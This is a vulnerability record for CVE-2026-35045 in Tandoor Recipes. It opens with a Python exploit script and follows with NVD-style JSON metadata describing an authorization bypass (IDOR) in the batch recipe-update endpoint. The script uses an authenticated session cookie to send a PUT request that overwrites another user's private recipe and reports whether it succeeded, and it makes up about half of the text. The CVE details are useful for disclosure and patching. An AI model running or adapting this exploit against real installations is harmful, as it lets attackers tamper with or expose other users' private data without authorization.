CVE-2026-35045

import requests # Target URL for the vulnerable batch update endpoint target_url = "https://example.com/api/recipe/batch_update/" # Attacker's authentication cookies (must be a valid user in the Space) cookies = { "sessionid": "attacker_valid_session_cookie" } # Headers for the request headers = { "Content-Type": "application/json" } # Payload containing the ID of a private recipe owned by another user # Attempting to modify a recipe (ID: 999) that the attacker does not own payload = [ { "id": 999, "name": "Hacked Recipe - Unauthorized Access", "description": "This recipe was private and has been modified via the IDOR vulnerability." } ] # Sending the PUT request to exploit the vulnerability response = requests.put(target_url, json=payload, headers=headers, cookies=cookies) if response.status_code == 200: print("[+] Exploit successful! Private recipe has been modified.") print("[+] Response:", response.text) else: print("[-] Exploit failed or patched.") print("[-] Status Code:", response.status_code)

{"cve": {"id": "CVE-2026-35045", "sourceIdentifier": "[email protected]", "published": "2026-04-06T18:16:42.133", "lastModified": "2026-04-10T18:32:17.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Prior to 2.6.4, the PUT /api/recipe/batch_update/ endpoint in Tandoor Recipes allows any authenticated user within a Space to modify any recipe in that Space, including recipes marked as private by other users. This bypasses all object-level authorization checks enforced on standard single-recipe endpoints (PUT /api/recipe/{id}/), enabling forced exposure of private recipes, unauthorized self-grant of access via the shared list, and metadata tampering. This vulnerability is fixed in 2.6.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tandoor:recipes:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.6.4", "matchCriteriaId": "D29C4837-2650-4BEF-A332-657E7D593877"}]}]}], "references": [{"url": "https://github.com/TandoorRecipes/recipes/releases/tag/2.6.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/TandoorRecipes/recipes/security/advisories/GHSA-v8x3-w674-55p5", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}